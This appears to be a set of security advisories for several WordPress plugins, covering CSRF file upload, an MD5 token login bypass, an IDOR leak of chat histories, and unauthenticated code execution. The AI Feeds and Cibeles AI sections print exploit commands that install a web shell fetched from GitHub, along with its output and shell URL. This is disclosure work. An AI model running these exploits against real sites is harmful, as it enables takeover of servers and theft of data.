The Bread & Butter IO plugin contains a vulnerability in its image upload functionality that allows any attacker to trick authenticated administrators into uploading arbitrary files to the server, including PHP web shells, leading to Remote Code Execution (RCE). The vulnerability stems from the uploadImage() function lacking CSRF protection, allowing attackers to craft malicious requests that administrators’ browsers will automatically execute.
The vulnerability exists in the uploadImage() function in /bread-butter/src/Base/Ajax.php which lacks proper file validation and CSRF protection, while using file_put_contents() to write files directly to the WordPress uploads directory before any security checks.
The WP Directory Kit plugin for Wordpress version 1.4.4 and below contains an authentication bypass in its auto-login functionality. The vulnerability allows unauthenticated attackers to gain administrative access to WordPress sites by exploiting a cryptographically broken token generation mechanism. The auto-login feature cannot be disabled and uses a predictable token that is derived solely from the MD5 hash of the user ID.
TL;DR Exploits
The CVE-2025-13390.sh file uploads a web shell plugin to a target site assuming user ID 1 is an administrator.
The MxChat Basic plugin does not verify session ownership in the mxchat_fetch_conversation_history AJAX endpoint, allowing unauthenticated users to access other users’ conversation history and IP addresses through Insecure Direct Object Reference (IDOR) vulnerabilities.
The mxchat_fetch_conversation_history() function in /includes/class-mxchat-integrator.php file retrieves conversation data based solely on a client-provided session_id without verifying that the requester owns the session. This allows any unauthenticated user with a valid nonce (available via frontend JavaScript) to access other users’ private conversation data. Additionally, the conversation history includes user IP addresses stored in the agent_name field, which are disclosed alongside the conversation data.
The AI Feeds WordPress plugin versions 1.0.11 and below contain an unauthenticated remote code execution vulnerability in the actualizador_git.php file. This file is directly accessible via HTTP without any authentication or authorization checks, allowing unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files, leading to remote code execution.
TL;DR Exploits
A exploit.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:
python3 CVE-2025-13597.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...
Eliminando entradas extra...
Copiando archivos...
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/ai-feeds
[*] Exploit executed. Checking if shell.php was created...
[*] Testing shell access...
www-data
[*] Shell should be accessible at:
http://techcorp.cc/wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND
Technical Analysis
The vulnerability exists in /wp-content/plugins/ai-feeds/actualizador_git.php. This file implements a GitHub repository mirroring system that can be accessed directly via HTTP without any security controls.
The Cibeles AI WordPress plugin versions 1.10.8 and below contain an unauthenticated remote code execution vulnerability in the actualizador_git.php file. This file is directly accessible via HTTP without any authentication or authorization checks, allowing unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files, leading to remote code execution.
TL;DR Exploits
A CVE-2025-13595.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:
python3 CVE-2025-13595.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...
Eliminando entradas extra...
Copiando archivos...
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/cibeles-ai
[*] Exploit executed. Checking if shell.php was created...
[*] Testing shell access...
www-data
[*] Shell should be accessible at:
http://techcorp.cc/wp-content/plugins/cibeles-ai/shell.php?cmd=COMMAND
Technical Analysis
The vulnerability exists in /wp-content/plugins/cibeles-ai/actualizador_git.php. This file implements a GitHub repository mirroring system that can be accessed directly via HTTP without any security controls.